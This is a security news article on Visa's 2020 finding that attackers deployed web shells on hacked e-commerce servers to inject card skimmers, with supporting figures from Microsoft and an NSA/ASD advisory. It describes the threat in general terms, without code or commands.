Visa Payment Fraud Disruption (PFD), a global payments operator’s security division, warns about an increasingly popular with bad actors trend in which they deploy web shells on compromised servers to exfiltrate credit card information.
Web shells are small pieces of code that allow threat actors to maintain persistence on hacked servers, remotely execute arbitrary code, carry out commands, move laterally within the compromised network, and deliver additional payloads.
VISA reports that throughout the past year, its security team has been observing a growing trend where attackers use web shells to inject JavaScript-based scripts known as credit card skimmers on compromised online stores. This campaign is known as web skimming, digital skimming, or e-Skimming attacks. The skimmers allow an attacker to steal payment card and personal information from online store customers and exfiltrate it via a CC2 terminal to their servers.
“Throughout 2020, Visa Payment Fraud Disruption (PFD) identified a trend whereby many eSkimming attacks used web shells to establish a command and control (C2) during the attacks,” VISA said.
PFD has seen at least 45 eSkimming attacks in 2020 using web shells, according to VISA security researchers. In addition, they “noted increasing web shell use across the wider information security threat landscape.”
Attackers mostly used web shells in Magecart attacks to plant backdoors on hacked online store servers and set up a command-and-control terminal to later transfer the stolen credit card information.
Among the methods the attackers employed to breach the online shops’ servers were exploiting vulnerabilities in unsecured administrative infrastructure, hacking eCommerce application/website plugins, and compromising outdated/unpatched eCommerce platforms.
In February, the Microsoft Defender Advanced Threat Protection (ATP) team confirmed VISA’s findings and reported that the number of web shells deployed on compromised servers has almost doubled since last year.
The Microsoft’s security team found on average 140,000 web shells on compromised servers each month between August 2020 to January 2021, whereas previously the figure was 77,000 web shells between July and December 2019.
Image: Microsoft
The US National Security Agency (NSA) also warned in a joint report issued with the Australian Signals Directorate (ASD) in April 2020 of threat actors escalating their attacks to backdoor vulnerable servers by deploying web shells.
“While the above tactics, techniques and procedures are not an exhaustive list of the various methods and exploits that attackers used in these web shell attacks, they are some of the leading methodologies identified,” VISA added.
“Identifying tactics, such as the use of web shells, also assists in identifying compromises when eSkimmers are not detected on the merchant website.
“The use of web shells to facilitate eSkimming attacks will likely persist, especially as the restrictions around in-person, brick-and-mortar commerce remain in place as the pandemic continues.”